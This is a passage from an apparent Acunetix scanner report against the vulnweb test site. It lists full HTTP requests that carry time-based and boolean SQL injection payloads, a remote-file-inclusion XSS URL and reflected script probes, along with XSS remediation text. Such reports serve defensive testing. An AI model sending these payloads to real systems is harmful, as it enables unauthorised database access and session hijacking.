signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email
.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=pktdumwo&
uuname=-1'%20OR%203*2*1=6%20AND%20000770=000770%20--%20
Request headers
/sendcommand.php
Details
URL encoded POST input cart_id was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ => 3.432s- (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6) ... (linetruncated)
POST /sendcommand.php HTTP/1.1
Content-Length: 130
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Request headers
36Acunetix Website Audit
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
cart_id=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'"%
2b(select(0)from(select(sleep(0)))v)%2b"*/
/userinfo.php
Details
Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000La9A'='000La9A Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000La9A'='000La9A => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000La9A'='000La9A => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000La9A'='000La9A => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000La9A'='000La9A => TRUE- test%2Ftest' A ... (line truncated)
GET /userinfo.php HTTP/1.1
Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000La9A'='000La9A;
PHPSESSID=c3e1qcecc963h1hoij3o57aik0; OAID=X3285C893B9A5D126A7E0F8151CC99234;
mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/userinfo.php
Details
URL encoded POST input uaddress was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: -(select(0)from(select(sleep(11.422)))v)/*'+(select(0)from(select(sleep(11.422)))v)+'"+(select(0)from(select(sleep(11.422)))v)+"*/ => 20.514 s- (select(0)from(select(sleep(17.133000000000002)))v)/*'+(select(0)from(select(sleep(17.133 ... (line truncated)
POST /userinfo.php HTTP/1.1
Content-Length: 218
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Request headers
37Acunetix Website Audit
Accept: */*
update=update&uaddress=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sle
ep(0)))v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/&ucc=1234-5678-2300-9000&uemail
=ccccc%40gmail.com&uphone=test&urname=test
/userinfo.php
Details
URL encoded POST input uaddress was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.432 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR ... (linetruncated) FROM INFORMATION_SCHEMA.TABLES
POST /userinfo.php HTTP/1.1
Content-Length: 226
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'
"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&ucc=1234-5678-2300-9000&uemail=ccccc@gmail
.com&uname=1&update=update&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input ucc was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>4.103 s- if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ = ...(line truncated)
POST /userinfo.php HTTP/1.1
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=if(now()
Request headers
38Acunetix Website Audit
=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"XOR(if(now()=sys
date()%2csleep(0)%2c0))OR"*/&uemail=ccccc%40gmail.com&uphone=test&urname=test
/userinfo.php
Details
URL encoded POST input ucc was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.495 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ = ...(line truncated)
POST /userinfo.php HTTP/1.1
Content-Length: 248
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate(
)%2csleep(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&[email protected]
m&uname=1&update=update&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uname was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ => 3.432s- (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9))) ... (linetruncated)
POST /userinfo.php HTTP/1.1
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
pass=test&uname=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))
v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/
Request headers
/userinfo.php
39Acunetix Website Audit
Details
URL encoded POST input uphone was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ => 9.47s- (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3))) ... (linetruncated)
POST /userinfo.php HTTP/1.1
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=ccccc%40gmail.com&uphone=(select(0)from(select(sleep(0)))v)/*'%2b(sele
ct(0)from(select(sleep(0)))v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/&urname=tes
t
Request headers
/userinfo.php
Details
URL encoded POST input urname was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.432 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"* ...(line truncated)
POST /userinfo.php HTTP/1.1
Content-Length: 267
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=ccccc%40gmail.com&uphone=test&urname=if(now()=sysdate()%2csleep(0)%2c0
)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR
"*/
Request headers
40Acunetix Website Audit
Cross site scripting
HighSeverity
ValidationType
Scripting (Remote_File_Inclusion_XSS.script)Reported by module
Description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user inorder to gather data from them. An attacker can steal the session cookie and take over the account, impersonating theuser. It is also possible to modify the content of the page presented to the user.
Recommendation
Your script should filter metacharacters from user input.
References
Cross site scripting
OWASP PHP Top 5
XSS Filter Evasion Cheat Sheet
The Cross Site Scripting Faq
Acunetix Cross Site Scripting Attack
VIDEO: How Cross-Site Scripting (XSS) Works
OWASP Cross Site Scripting
How To: Prevent Cross-Site Scripting in ASP.NET
Affected items
/showimage.php
Details
URL encoded GET input file was set to http://testasp.vulnweb.com/t/xss.html?%00.jpg
GET /showimage.php?file=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg&size=160
HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/showimage.php
Details
URL encoded GET input file was set to http://testasp.vulnweb.com/t/xss.html?%00.jpg
GET /showimage.php?file=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Request headers
41Acunetix Website Audit
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
42Acunetix Website Audit
Cross site scripting (verified)
HighSeverity
ValidationType
Scripting (XSS_in_URI_File.script)Reported by module
Description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user inorder to gather data from them. An attacker can steal the session cookie and take over the account, impersonating theuser. It is also possible to modify the content of the page presented to the user.
Recommendation
Your script should filter metacharacters from user input.
References
Acunetix Cross Site Scripting Attack
VIDEO: How Cross-Site Scripting (XSS) Works
The Cross Site Scripting Faq
OWASP Cross Site Scripting
XSS Filter Evasion Cheat Sheet
Cross site scripting
OWASP PHP Top 5
How To: Prevent Cross-Site Scripting in ASP.NET
Affected items
/404.php
Details
URI was set to 1<ScRiPt>42kR(9973)</ScRiPt>The input is reflected inside a text element.
GET /404.php?1<ScRiPt>42kR(9973)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/AJAX/showxml.php
Details
Cookie input mycookie was set to 3'"()&%<acx><ScRiPt >1saf(9039)</ScRiPt>
GET /AJAX/showxml.php HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZP
Request headers
43Acunetix Website Audit
e08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk;
mycookie=3'"()&%<acx><ScRiPt%20>1saf(9039)</ScRiPt>
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/comment.php
Details
URL encoded POST input name was set to <your%20name%20here>'"()&%<acx><ScRiPt >AAIu(9657)</ScRiPt>
POST /comment.php HTTP/1.1
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Submit=Submit&comment=1&name=<your%2520name%2520here>'"()%26%25<acx><ScRiPt%20>AAIu(9657
)</ScRiPt>&phpaction=echo%20%24_POST[comment];
Request headers
/guestbook.php
Details
URL encoded POST input name was set to 1'"()&%<acx><ScRiPt >ipR3(9455)</ScRiPt>
POST /guestbook.php HTTP/1.1
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
name=1'"()%26%25<acx><ScRiPt%20>ipR3(9455)</ScRiPt>&text=1
Request headers
/guestbook.php
Details
URL encoded POST input name was set to test'"()&%<acx><ScRiPt >qM7p(9301)</ScRiPt>
POST /guestbook.php HTTP/1.1
Content-Length: 82
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZP
Request headers
44Acunetix Website Audit
e08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
submit=add%20message&name=test'"()%26%25<acx><ScRiPt%20>qM7p(9301)</ScRiPt>&text=1
/guestbook.php
Details
URL encoded POST input text was set to 1'"()&%<acx><ScRiPt >qM7p(9520)</ScRiPt>
POST /guestbook.php HTTP/1.1
Content-Length: 82
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
submit=add%20message&name=test&text=1'"()%26%25<acx><ScRiPt%20>qM7p(9520)</ScRiPt>
Request headers
/guestbook.php
Details
URL encoded POST input text was set to 1'"()&%<acx><ScRiPt >ipR3(9803)</ScRiPt>
POST /guestbook.php HTTP/1.1
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
name=1&text=1'"()%26%25<acx><ScRiPt%20>ipR3(9803)</ScRiPt>
Request headers
/hpp/
Details
URL encoded GET input pp was set to 12'"()&%<acx><ScRiPt >Prtb(9620)</ScRiPt>
GET /hpp/?pp=12'"()%26%25<acx><ScRiPt%20>Prtb(9620)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
45Acunetix Website Audit
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/hpp/index.php
Details
URL encoded GET input pp was set to 12'"()&%<acx><ScRiPt >4gFH(9455)</ScRiPt>
GET /hpp/index.php?pp=12'"()%26%25<acx><ScRiPt%20>4gFH(9455)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/hpp/params.php
Details
URL encoded GET input p was set to 1'"()&%<acx><ScRiPt >uOEX(9270)</ScRiPt>
GET /hpp/params.php?aaaa=&p=1'"()%26%25<acx><ScRiPt%20>uOEX(9270)</ScRiPt>&pp=1 HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
